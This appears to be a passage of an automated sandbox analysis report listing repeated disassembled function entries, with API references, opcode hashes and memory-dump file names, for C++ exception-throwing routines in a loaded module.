                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: 1a1f3d373f89c7e163dcf38dd462a502fcb247c22304715aec7bf3fd6dfd616a
                                                                                                          • Instruction ID: 391930749283e9ed43afccf343008c3a0f140dd53832df4120c85f339220fba7
                                                                                                          • Opcode Fuzzy Hash: 1a1f3d373f89c7e163dcf38dd462a502fcb247c22304715aec7bf3fd6dfd616a
                                                                                                          • Instruction Fuzzy Hash: BDF03076D04309ABD704DF98D841B8A7BF8AF15340B40C26AD9199B264EB31AA04CB91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F0368B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F0368D8
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F0368ED
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: 8508037132d868420b0a0b16259f4771f4b3671a6c98dc1bf3d318d7714f1292
                                                                                                          • Instruction ID: cf545187e14e9131d3d56f3e56ecac09ac2b1dddc6327e0a417943850b02f143
                                                                                                          • Opcode Fuzzy Hash: 8508037132d868420b0a0b16259f4771f4b3671a6c98dc1bf3d318d7714f1292
                                                                                                          • Instruction Fuzzy Hash: 4BF03076904319AFDB04DF98E841F8A7BF8AF15340B40C26AD8199B254EB31EA00CB95
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F0367F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F036818
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F03682D
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: ec92ee3a53ee5a2cf2d6bce2f09f11901c60f48337635d9265e7a990d4e21a79
                                                                                                          • Instruction ID: 5fb84ac97231b58533b6a90c7ff7956e458be4a598218fbb465bfa257d1ca97f
                                                                                                          • Opcode Fuzzy Hash: ec92ee3a53ee5a2cf2d6bce2f09f11901c60f48337635d9265e7a990d4e21a79
                                                                                                          • Instruction Fuzzy Hash: 87F03076904309AFDB04DF98D851F8A77F8AF15740B50C26AD8199B354EB31EA00CB95
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F0346F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F034718
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F03472D
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: 35319cb706727112682deda7c00cffaee5e7d02f120e9a7fd59c15b3b06e1c00
                                                                                                          • Instruction ID: 4ec7b838bcc5fcc96ed2379a9dedeabbc5e8b592ca34c34f55782c1535cc0a77
                                                                                                          • Opcode Fuzzy Hash: 35319cb706727112682deda7c00cffaee5e7d02f120e9a7fd59c15b3b06e1c00
                                                                                                          • Instruction Fuzzy Hash: 61F0307A904309AFD714DF98D841B8A77F8AF15740B40C16AD9199B254EB31BA00CBD1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F0345E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F034608
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F03461D
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: 4c01fe43fd518cf2c91f1a182683c0cd9efef260565b9b89ae46576b6f603239
                                                                                                          • Instruction ID: 6df086bc1db05ab01ce945e75e43c4d4e5ade0b5b29af7c14bc7f6bad562f4fc
                                                                                                          • Opcode Fuzzy Hash: 4c01fe43fd518cf2c91f1a182683c0cd9efef260565b9b89ae46576b6f603239
                                                                                                          • Instruction Fuzzy Hash: 9EF0B476D04308BFD704DF98D841B8A77F8AF04340F40C16ED8199B250EB71EA00CB91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F034360 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F034388
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F03439D
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: b235babbd7af16aa8f5a9af5a092254c4d91757eee4da086281a8b5cd6de5dec
                                                                                                          • Instruction ID: c8df85f240e52ce02ecc539edd75036683a8b35fe2cff56fab3cad411a0feb47
                                                                                                          • Opcode Fuzzy Hash: b235babbd7af16aa8f5a9af5a092254c4d91757eee4da086281a8b5cd6de5dec
                                                                                                          • Instruction Fuzzy Hash: DDF0B476804308AFD704DF99D941B8A77F8AF04340F00C16ED8199B350EB31EA00CB91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F034240 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F034268
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F03427D
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: a86991207ab578eefca9476d4070cceb8b6920f771e1e52d8344f7eb9eb21e76
                                                                                                          • Instruction ID: f0b94704eb28368cfe9af8e342667c295894a7fc4c0ed6a8b5978bbf03e0e52c
                                                                                                          • Opcode Fuzzy Hash: a86991207ab578eefca9476d4070cceb8b6920f771e1e52d8344f7eb9eb21e76
                                                                                                          • Instruction Fuzzy Hash: EFF03076904309ABD708DF98D841B8A77F8AF15344F40C16AD9199B254EB72EA00CBA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F0342D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F0342F8
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F03430D
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: 280df3a0745419e394f4d0feab0f6df123eead98059b6623e2caac63061b1495
                                                                                                          • Instruction ID: 0d79e0a9680d9798c9c6cf5447a87027fd5802bbe9154ba2e2874ec1c15ca11b
                                                                                                          • Opcode Fuzzy Hash: 280df3a0745419e394f4d0feab0f6df123eead98059b6623e2caac63061b1495
                                                                                                          • Instruction Fuzzy Hash: 81F05476904309AFDB04EF98D941B8A77F8AF15340F40C16ED9199B255EB31EA00CB91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F0541B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F0541D8
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F0541ED
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: ed2c5da877956e4952f38f66afde2865d7c655eea4b4fe3b84be08676eef486c
                                                                                                          • Instruction ID: 013ce8c9de5f9da2400e37ceb6dcea2f9e96a11ac78b3cabe607cf538e71af74
                                                                                                          • Opcode Fuzzy Hash: ed2c5da877956e4952f38f66afde2865d7c655eea4b4fe3b84be08676eef486c
                                                                                                          • Instruction Fuzzy Hash: 1EF09075800308BBDB08DF98D841BCA77F8AF15340B40C16ED8199B250EB71AA14CBA5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F04DD50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F04DD78
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F04DD8D
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: e69d23da4c240a1df61aa3bb1e0881116799a779d7567f1199b0014a1513e8c4
                                                                                                          • Instruction ID: 44d90c8d1351b0ab1f9cf0cfeb4ee8e5c1e9757d1d4ed339d6278407e43307ef
                                                                                                          • Opcode Fuzzy Hash: e69d23da4c240a1df61aa3bb1e0881116799a779d7567f1199b0014a1513e8c4
                                                                                                          • Instruction Fuzzy Hash: D9F054B5904308AFDB04DF98D841B8A7BF8AF15340F40C1AED8199B254FB31EA00CB91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F045BB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
                                                                                                          • std::exception::exception.LIBCMT ref: 6F045BD8
                                                                                                            • Part of subcall function 6F089533: std::exception::_Copy_str.LIBCMT ref: 6F08954E
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 6F045BED
                                                                                                            • Part of subcall function 6F08AC75: RaiseException.KERNEL32(?,?,6F089C34,F6D10407,?,?,?,?,6F089C34,F6D10407,6F0B9C90,6F0CB974,F6D10407), ref: 6F08ACB7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.985301537.000000006F021000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6F020000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.985296045.000000006F020000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985379199.000000006F0A4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985396418.000000006F0BE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985404940.000000006F0C0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985412311.000000006F0C1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985419999.000000006F0C3000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985437200.000000006F0CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.985449567.000000006F0CE000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_6f020000_46A3.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Copy_strExceptionException@8RaiseThrow_mallocstd::exception::_std::exception::exception
                                                                                                          • String ID: 0Bo
                                                                                                          • API String ID: 2299493649-2241063504
                                                                                                          • Opcode ID: e427fa7ffcfaa0fd29cbd5d6b504f5a7cd20dfb74f804df15c6d8a81d7c58f25
                                                                                                          • Instruction ID: 28a7278b7f5b9914d7a44050708e4d42db34205528d57f5bd6f44c9837f267a8
                                                                                                          • Opcode Fuzzy Hash: e427fa7ffcfaa0fd29cbd5d6b504f5a7cd20dfb74f804df15c6d8a81d7c58f25
                                                                                                          • Instruction Fuzzy Hash: ADF03076904308ABD704DF99D841B9AB7F8AF15740F40C16AD8199B654EB31AA00CBD5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 6F034E00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 6F089BB5: _malloc.LIBCMT ref: 6F089BCF
